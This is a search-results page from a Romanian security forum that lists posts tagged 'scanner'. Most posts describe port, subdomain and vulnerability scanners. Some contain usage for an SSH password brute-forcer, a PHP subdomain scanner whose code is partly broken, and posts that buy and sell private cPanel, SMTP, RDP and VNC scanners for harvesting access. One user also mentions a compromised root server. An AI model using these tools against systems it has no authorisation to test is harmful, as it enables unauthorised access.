Jump to content

Search the Community

Showing results for tags 'scanner'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. wget de la arhiva gasiti pe website-ul meu oficial: https://rpgfrankfurdro.000webhostapp.com/ Nu cred ca este nevoie de un video sau poza pentru asa ceva!
  2. URL Dumper is an Online scanner SQLi,XSS. Used too get XSS and SQL Injections vulns.. supports multi search engine, trash system, etc.. Features: -Get all page links by advanced technique with regular expression; -XSS Scanner (auto check all page links); -SQLInjection Scanner (auto check all page links); -Multi-Thread engine; -Get many links by search (google/Yahoo/Live Search/Altavista/Terravista) -Search in the page source by regular expression; -View Source (Code/Browser); -Trash system -Database in SQLite to organize the URL’s -Enabled Proxy server Descarca Cod sursa
  3. fi6s: Fast IPv6 scanner fi6s is a IPv6 port scanner designed to be fast. This is achieved by sending and processing raw packets asynchronously. The design and goal is pretty similar to Masscan, though it is not as full-featured yet. Building Building should be fairly easy on up-to-date distros. On Ubuntu 16.04 (xenial) it looks like this: # apt install gcc make git libpcap-dev $ git clone https://github.com/sfan5/fi6s.git $ cd fi6s $ make BUILD_TYPE=release The scanner executable will be ready in at ./fi6s. Note that fi6s is developed solely on Linux, thus it probably won't compile on non-Linux OSs (notably Windows). Usage: Usage is pretty easy, fi6s will try to auto-detect the dirty technical details (source/dest MAC, source IP). # ./fi6s -p 80,8000-8100 2001:db8::/120 This example will: scan the 2001:db8::/120 subnet (256 addresses in total) scans port 80 and ports 8000 to 8100 (102 ports in total) output scan results to stdout in the "list" format There are more different ways of specifying an address range to scan, if you aren't sure what's about to happen invoke fi6s with --echo-hosts and it will print every host that would've been scanned. For advanced features please consult the output of ./fi6s -h. Grabbing banners Since fi6s has its own TCP stack, the OS stack needs to disabled to avoid interference with banner grabbing (RST packets). This is most easily done using ip6tables and a constant --source-port. Banner grabbing is then enabled by passing --banners: # ip6tables -A INPUT -p tcp -m tcp --dport 12345 -j DROP # ./fi6s -p 22 --banners --source-port 12345 2001:db8::/120 Download: fi6s-master.zip or: git clone https://github.com/sfan5/fi6s.git Source
  4. Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container. docker-onion-nmap Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050. Tor is also configured via DNSPort to anonymously resolve DNS requests to port 9053. dnsmasq is configured to with this localhost:9053 as an authority DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests will go through Tor and applications can resolve .onion addresses. Example: $ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.7s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds How it works: When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command. Arguments: By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com). For example, this: docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example: docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion and docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.: docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion Environment variables: There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example: $ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait retry 0] Check socket is open on localhost:9050... [tor_wait retry 0] Socket OPEN on localhost:9050 [tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )... [tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 1] Check socket is open on localhost:9050... [tor_wait retry 1] Socket OPEN on localhost:9050 [tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )... [tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 2] Check socket is open on localhost:9050... [tor_wait retry 2] Socket OPEN on localhost:9050 [tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )... [tor_wait retry 2] SOCKS proxy UP on localhost:9050 [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.8s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds Notes: No UDP available over Tor Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap gr33tz @jessfraz tor-proxy @zuazo alpine-tor-docker shellhacks crypto-rebels.de Download: docker-onion-nmap-master.zip or git clone https://github.com/milesrichardson/docker-onion-nmap.git Source
  5. Inventus Inventus is a spider designed to find subdomains of a specific domain by crawling it and any subdomains it discovers. It's a Scrapy spider, meaning it's easily modified and extendable to your needs. Demo https://asciinema.org/a/PGIeEpEwZTUdgxrolBpCjljHL# Requirements Linux -- I haven't tested this on Windows. Python 2.7 or Python 3.3+ Scrapy 1.4.0 or above. Installation Inventus requires Scrapy to be installed before it can be run. Firstly, clone the repo and enter it. $ git clone https://github.com/nmalcolm/Inventus $ cd Inventus Now install the required dependencies using pip. $ pip install -r requirements.txt Assuming the installation succeeded, Inventus should be ready to use. Usage The most basic usage of Inventus is as follows: $ cd Inventus $ scrapy crawl inventus -a domain=facebook.com This tells Scrapy which spider to use ("inventus" in this case), and passes the domain to the spider. Any subdomains found will be sent to STDOUT. The other custom parameter is subdomain_limit. This sets a max limit of subdomains to discover before quitting. The default value is 10000, but isn't a hard limit. $ scrapy crawl inventus -a domain=facebook.com -a subdomain_limit=100 Exporting Exporting data can be done in multiple ways. The easiest way is redirecting STDOUT to a file. $ scrapy crawl inventus -a domain=facebook.com > facebook.txt Scrapy has a built-in feature which allows you to export items into various formats, including CSV, JSON, and XML. Currently only subdomains will be exported, however this may change in the future. $ scrapy crawl inventus -a domain=facebook.com -t csv -o Facebook.csv Configuration Configurations can be made to how Inventus behaves. By default Inventus will ignore robots.txt, has a 30 second timeout, caches crawl data for 24 hours, has a crawl depth of 5, and uses Scrapy's AutoThrottle extension. These and more can all be changed by editing the inventus_spider/settings.py file. Scrapy's settings are well documented too. Bugs/Suggestions/Feedback Feel free to open a new issue for any of the above. Inventus was built in only a few hours and will likely contain bugs. You can also connect with me on Twitter. License Released under the MIT License. See LICENSE. Download: Inventus-master.zip or git clone https://github.com/nmalcolm/Inventus.git Source
  6. cine ma poate ajuta cu cateva scanere?
  7. care e cel mai bun cpanel scanner?
  8. Buna ! Ma poate ajuta si pe mine cineva cum pot scana ? Multumesc.
  9. Vulnerability scanner for Linux, agentless, written in golang. https://github.com/future-architect/vuls
  10. Am gasit un scanner de smtp-uri de linux si m-am gandit sa il postez , nu stiu cum functioneaza am vazut ca ia smtp-uri si din email si din ip .... poate ma lamuriti si pe mine Fastupload.ro - transfer rapid de fi?iere online
  11. Salutare, mai jos va dau un scanner de ssh22. E vechi, dar inca-si face treaba explorer.eu5.org/scanner.jpg Scuze nu mai era activ ftp-ul
  12. Cumpar Socks 4/5 scanner (private made) sa fie facut in python, sa scaneze pe ip range sau ip class , exclus port 1080, 80 .. Astept oferte pe privat. Copiii/new user sa se abtina, nu fac nici un deal decat cu useri cu reputatie. Multumesc
  13. https://www.sendspace.com/file/kogvti
  14. Salut,tocmai mi-am luat un root si am observat ca nu e chiar asa de bun la floodat,si mam gandit sa il fac ca scanner,dar na nu am scanner..:)Am folosit unixcod nu prea il inteleg,cine stie unu mai bun||? Multumesc
  15. HostBox SSH is a SSH password/account scanner written in python. README 2.0 Install INSTALLING WXPYTHON ------------------- http://wiki.wxpython.org/InstallingOnUbuntuOrDebian INSTALLING PARAMIKO ------------------- sudo apt-get install python-paramiko 3.0 Usage To run HB in GUI mode: --------------------- ./HostBox-SSH.py Should start the GUI, alt. try: "python HostBox-SSH.py" or "chmod +x HostBox-SSH.py && ./HostBox-SSH.py To run HB in Console mode: ------------------------- ./HostBox-SSH -h For help with command line options Command line options: HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] [-n/-f] Username Options: -u user1,user2,user3.. || --ufile=usernames.txt Password Options: -p pass1,pass2,pass3.. || --pfile=passwords.txt Break Options: -1: Break on account login -2: Break on server login Speed Options: -n for normal scan || -f for fast scan mode Examples: ./HostBox.py -i ip-list.txt -u guest,test,root -p blank,-username,password -1 -n This is running hostbox listing usernames and password settings on the commandline. -1 is break account testing when a login is found for that account. -n means normal scan speed. ./HostBox.py -i ip-list.txt --ufile=usernames.txt --pfile=passwords.txt -2 -f This is running hostbox listing usernames and passwords from a textfile. -2 means the scanner will break testing the server when a login is found for that server. -f is for fast scan mode or multithreaded scan. "-username" and "blank" in the username/password spec tells the scanner to use the username as password / check for blank passwords. VISIT OSKAR STRIDSMAN'S IT RESOURCE -- StridsmanIT.wordpress.com -- HostBox-SSH 0.2 REPORT BUGS TO: https://stridsmanit.wordpress.com/ssh-scanner/ Download HostBox SSH 0.2 ? Packet Storm
  16. rukov

    Ssh Scanner

    Download https://mega.co.nz/#!gR5R0IyL!UPdmJoMBPt0i3G58AZDYPa7sk7isFhQ8c77DinvZwwI
  17. MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches. Changes: Added support for filter_wrapup callback. Various bug fixes, a typo fixed, and all perl function prototypes removed. Download Site: MIMEDefang | MIMEDefang
  18. Pentru c? acum câteva zile am avut nevoie s?... scanez un ip pentru port-uri deschise, ?i pentru c? n-am dorit s? folosesc uneltele disponibile deja online, m-am „jucat” un pic. ?i pentru c? „sharing is good”, postez programul ?i codul surs? pentru oricine are nevoie de un scanner TCP multithreaded. Executabilul compilat poate fi desc?rcat aici. Codul surs? (proiect Visual Studio 2013) poate fi desc?rcat aici. Enjoy!
  19. SSH GOSH SCANNER ! l-am gasit pe un vps nu stiu nimic de el ! GOSH
  20. <?php /* Bing SubDomain Scanner By injector_ma */ error_reporting(0); set_time_limit(0); if (!function_exists ("curl_exec")) die ("Fatal Error : cURL Extension is not Installed...\n"); $domain = $argv[1]; echo" _________ ___. .___ .__ / _____/__ _\_ |__ __| _/____ _____ _____ |__| ____ ______ \_____ \| | \ __ \ / __ |/ _ \ / \\__ \ | |/ \ / ___/ / \ | / \_\ \/ /_/ ( <_> ) Y Y \/ __ \| | | \\___ \ /_______ /____/|___ /\____ |\____/|__|_| (____ /__|___| /____ > \/ \/ \/ \/ \/ \/ \/ \n"; if(count(Bingsub ($domain)) == 0){ $subs = array( "app","apps","cpanel","ftp","mail","mysql","webmail","smtp","pop","pop3","direct-connect", "direct-connect-mail","record","ssl","dns","help","blog","forum","doc","home","shop", "vb","www","web","webadmin","weblog","webmail","webmaster","webservices","webserver", "log","logs","images","lab","ftpd","docs","download","downloads","about","backup", "chat","data","smtp","upload","uploads","ns1","ns2","record","ssl","imap","result", "vip","demo","beta","video" ); echo"\n\t\tNothing Found. Start Using Brute Force Methode ...\n\n"; foreach($subs as $sub){ $Check = @fsockopen("$sub.$domain", 80); if($Check){ echo "$sub.$domain : ".gethostbyname("$sub.$domain")." \n\n"; $save = fopen('subdomains.txt','ab'); fwrite($save,"http://$sub.$domain\r\n"); fclose($save); } } }else{ foreach(Bingsub ($domain) as $sub){ echo $sub." : "; echo gethostbyname($sub)."\r\n"; $save = fopen('subdomains.txt','ab'); fwrite($save,"http://".$sub."\r\n"); fclose($save); } } function Bingsub ($domain) { for($i = 1; $i <= 1000; $i += 10){ $gt = curlreq("http://www.bing.com/search?q=".urlencode("domain:$domain")."&first=$i","msnbot/1.0 (+http://search.msn.com/msnbot.htm)"); $searchme = '#<h2><a href="(.*?)"#i'; if (preg_match_all ($searchme, $gt, $matches)){ foreach ($matches[1] as $matches){ $urls[] = cleanme ($matches); } } if(!preg_match('#class="sb_pagN"#',$gt)) break; } if(!empty($urls) && is_array($urls)){ return array_unique($urls); } } function cleanme ($link){ return str_replace("www.","",parse_url($link, PHP_URL_HOST)); } function curlreq($url, $user_agent, $proxy = FALSE, $post = FALSE) { $ch = @curl_close($ch); return $source; } Sursa
  21. Caut un scanner pentru nologin astept oferte !
  22. Cumpar Scanner Rdp linux sau windows sa fie bun cat de cat macar sa prinda 20-30 rdp-uri bune pe zi ! add : cryptbymme !
  23. Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively. SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES Google launched the Google Cloud Security Scanner in beta. The New web application vulnerability scanner allows App Engine developers to regularly scan their applications for two common web application vulnerabilities: Cross-Site Scripting (XSS) Mixed Content Scripts Despite several free web application vulnerability scanner and vulnerability assessment tools are available in the market, Google says these website vulnerability scanners are typically hard to set up and "built for security professionals," not for web application developers that run the apps on the Google App Engine. While Google Cloud Security Scanner will be easier for web application developers to use. This web application vulnerability scanner easily scans for Cross-Site Scripting (XSS) and mixed content scripts flaws, which the company argues are the most common security vulnerabilities Google App Engine developers face. Today, common HTML5 and JavaScript-heavy applications are more challenging to crawl and test, and Google Cloud Security Scanner claims to take a novel approach by parsing the code and then executing a full-page render to find more complex areas of a developer's site. GO FOR WEB VULNERABILITY SCAN NOW The developers can access the Cloud Security Scanner under Compute > App Engine > Security in Google's Developers Console. This will run your first scan. It does not work with App Engine Managed VMs, Google Compute Engine, or other resources. Google notes that there are two typical approaches to such security scans: Parse the HTML and emulate a browser – This is fast; however, it comes at the cost of missing site actions that require a full DOM or complex JavaScript operations. Use a real browser – This approach avoids the parser coverage gap and most closely simulates the site experience. However, it can be slow due to event firing, dynamic execution, and time needed for the DOM to settle. Security Engineering head Rob Mann says that their web vulnerability scanner uses Google Compute Engine to dynamically create a botnet of hundreds of virtual Chrome workers that scan at a max rate of 20 requests per second, so that the target sites won’t be overloaded. The search engine giant still recommended developers to look into manual security review by a web app security professional, just to be on the safer side. However, the company hopes its vulnerability scanner tool will definitely provide a simple solution to the most common App Engine issues with minimal false positives. Source
  24. Vand scannere private - Scanner Cpanel - Pret 90$ - Scanner SMTP - Pret 50$ - Scanner VNC - Pret 30$ Plata PerfectMoney, WMZ sau cod de reincarcare
×
×
  • Create New...